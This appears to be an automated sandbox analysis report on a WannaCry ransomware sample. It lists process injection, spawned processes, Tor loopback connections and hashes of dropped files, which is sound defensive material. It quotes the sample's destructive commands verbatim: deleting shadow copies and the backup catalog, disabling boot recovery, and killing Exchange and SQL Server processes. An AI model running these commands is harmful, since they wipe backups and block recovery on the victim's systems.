Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3256 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\cmd.exe
PID 3256 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\cmd.exe
PID 3256 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\cmd.exe
PID 1168 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1168 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1168 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3256 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3256 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3256 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3256 wrote to memory of 4816 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 4816 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 4816 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\taskkill.exe
PID 3256 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3256 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3256 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3256 wrote to memory of 3092 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\cmd.exe
PID 3256 wrote to memory of 3092 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\cmd.exe
PID 3256 wrote to memory of 3092 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Windows\SysWOW64\cmd.exe
PID 3092 wrote to memory of 928 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3092 wrote to memory of 928 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3092 wrote to memory of 928 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3256 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3256 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 3256 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\WannaCry.exe C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
PID 928 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe C:\Windows\SysWOW64\cmd.exe
PID 928 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe C:\Windows\SysWOW64\cmd.exe
PID 928 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe C:\Windows\SysWOW64\cmd.exe
PID 3724 wrote to memory of 452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3724 wrote to memory of 452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3724 wrote to memory of 452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\WannaCry.exe

"C:\Users\Admin\AppData\Local\Temp\WannaCry.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 197341729450364.bat

C:\Windows\SysWOW64\cscript.exe

cscript //nologo c.vbs

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe

!WannaDecryptor!.exe f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im MSExchange*

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Microsoft.Exchange.*

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im sqlserver.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im sqlwriter.exe

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe

!WannaDecryptor!.exe c

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /b !WannaDecryptor!.exe v

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe

!WannaDecryptor!.exe v

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe

!WannaDecryptor!.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9150 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9150 tcp
N/A 127.0.0.1:9150 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9150 tcp
N/A 127.0.0.1:9150 tcp

Files

memory/3256-6-0x0000000010000000-0x0000000010012000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u.wry

MD5 cf1416074cd7791ab80a18f9e7e219d9
SHA1 276d2ec82c518d887a8a3608e51c56fa28716ded
SHA256 78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df
SHA512 0bb0843a90edacaf1407e6a7273a9fbb896701635e4d9467392b7350ad25a1bec0c1ceef36737b4af5e5841936f4891436eded0533aa3d74c9a54efa42f024c5

C:\Users\Admin\AppData\Local\Temp\197341729450364.bat

MD5 3540e056349c6972905dc9706cd49418
SHA1 492c20442d34d45a6d6790c720349b11ec591cde
SHA256 73872a89440a2cba9d22bf4961c3d499ea2c72979c30c455f942374292fedadc
SHA512 c949d147100aef59e382c03abf7b162ae62a4d43456eebd730fbedcf5f95f5e1a24f6e349690d52d75331878a6ee8f6b88a7162ee9cf2a49e142196b12d0133c

C:\Users\Admin\AppData\Local\Temp\c.vbs

MD5 5f6d40ca3c34b470113ed04d06a88ff4
SHA1 50629e7211ae43e32060686d6be17ebd492fd7aa
SHA256 0fb5039a2fe7e90cdf3f22140d7f2103f94689b15609efe0edcc8430dd772fc1
SHA512 4d4aa1abd2c9183202fd3f0a65b37f07ee0166ba6561f094c13c8ea59752c7bdd960e37c49583746d4464bc3b1dc0b63a1fe36a37ce7e5709cd76ed433befe35

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe.lnk

MD5 7fda7a2bc027ce376e360254a00d5c3a
SHA1 d898f092d58f6356f1149999466cf5d2ca0cb21a
SHA256 b2bf2d02cf04068ec1a5120ea5416e9e56db6800479c168b60af28e325141e57
SHA512 eebbf24920b5035005859152cfe831442df6134346ea61d6361b7b01860d913cb4688badd974698daa87c1820d96b6f5a568b98fcb55cf26b34104af9ed0e6aa

C:\Users\Admin\AppData\Local\Temp\c.wry

MD5 d5826e36a887bf8a4905d3a7df12f8e6
SHA1 b208d89da4bcc9ba38db50f90513e5cff818f1de
SHA256 9e436a4f8eae5ed4836d9883c572612ae11d15761a430d0eae314d96a43ea081
SHA512 b2fb4e33571cbc1b424e9c2b36fbc1c7f8564b00a92df6fb335f8252fdcf5a05dc690de86d762f6e075cf735770d7935f8e3404c2ccb2dda5daef49e1432bdb1

C:\Users\Admin\AppData\Local\Temp\00000000.res

MD5 bb16e480d877f6447196eaf7f68c9298
SHA1 d13b8685f99b10cf155e2a8acea0bf1eed132e32
SHA256 f1ef9df2d92dc46d3565d0932e74f6da8346439f5b7abad048a37290d3e55257
SHA512 55533d647eb943f256bf365a4c9f7274fedc8c01e6bca703a3b10a9da0ca5f84f999d5cdee76f67cf6b9fef6111b9364c63e23abfa6c965228938061ad95ad14

C:\Users\Admin\AppData\Local\Temp\!Please Read Me!.txt

MD5 afa18cf4aa2660392111763fb93a8c3d
SHA1 c219a3654a5f41ce535a09f2a188a464c3f5baf5
SHA256 227082c719fd4394c1f2311a0877d8a302c5b092bcc49f853a5cf3d2945f42b0
SHA512 4161f250d59b7d4d4a6c4f16639d66d21b2a9606de956d22ec00bedb006643fedbbb8e4cde9f6c0c977285918648314883ca91f3442d1125593bf2605f2d5c6b

C:\Users\Admin\AppData\Local\Temp\00000000.res

MD5 8b02d1311ffcf6007f9d5ee7395d42af
SHA1 e1fb58234a39807e6c67bc343c4f25d8650578fe
SHA256 7360d481a480e53640b5af93237ceea5a2c9540083b4c2687a565cca88e57e60
SHA512 22d4229995dd88f199b261d12d9f2d69c3fb533da99ce532baa3e4a8027a9404cfc83a99ac133e8b9e66f1facb03e1d618003ac2438af3b29476fed431f689dc

C:\Users\Admin\AppData\Local\Temp\m.wry

MD5 980b08bac152aff3f9b0136b616affa5
SHA1 2a9c9601ea038f790cc29379c79407356a3d25a3
SHA256 402046ada270528c9ac38bbfa0152836fe30fb8e12192354e53b8397421430d9
SHA512 100cda1f795781042b012498afd783fd6ff03b0068dbd07b2c2e163cd95e6c6e00755ce16b02b017693c9febc149ed02df9df9b607e2b9cca4b07e5bd420f496